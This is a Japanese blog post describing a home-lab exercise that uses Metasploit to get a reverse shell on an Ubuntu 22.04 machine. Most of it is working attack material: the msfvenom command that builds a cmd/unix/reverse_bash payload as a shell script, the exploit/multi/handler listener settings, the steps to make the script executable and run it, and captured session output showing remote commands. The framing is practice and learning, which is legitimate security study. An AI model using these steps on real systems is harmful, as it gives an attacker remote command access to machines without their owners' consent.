概要
前回 Windows に対して行ってみました
今回は Ubuntu 環境に対して行ってみます
環境
- Ubuntu 22.04
- Metasploit 6.3.60
インストール
リバースシェルスクリプト生成
payload = cmd/unix/reverse_bash を使います
似たようなペイロードに generic/shell_reverse_tcp や linux/x64/shell_reverse_tcp がありますが形式がバイナリであったり elf 形式でわかりづらいので今回は bash 形式のペイロードを使います
- msfconsole
msf6>
モードになります
-
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.100.2 -f raw -o /home/devops/work/test.sh
192.168.100.2 は Ubuntu のアドレスです
待ち受け
こちらは好きなホストで実施して OK です
リバースシェルを待ち受ける側のホストで実行します
- msfconsole
msf6>
モードになります
- use exploit/multi/handler
- set payload cmd/unix/reverse_bash
- set LHOST 192.168.100.2
- exploit
動作確認
Ubuntu 側に test.sh を配置して実行権限を与えます
- chmod +x /home/devops/work/test.sh
- ./home/devops/work/test.sh
あとは実行すると待ち受け側でコマンドが実行できることが確認できます
[*] Started reverse TCP handler on 192.168.100.2:4444
[*] Command shell session 2 opened (192.168.100.2:4444 -> 192.168.100.2:41490) at 2024-03-13 16:55:59 +0900
pwd
/home/devops/work
uname -an
Linux ubuntu01 5.15.0-92-generic #102-Ubuntu SMP Wed Jan 10 09:33:48 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
最後に
Metasploit を使って Ubuntu に対してリバースシェルを行ってみました
生成されるシェルスクリプトはかなりシンプルなファイルなのでわざわざ Metasploit を使わなくても OK ですが Metasploit に慣れるためにそうしています
0 件のコメント:
コメントを投稿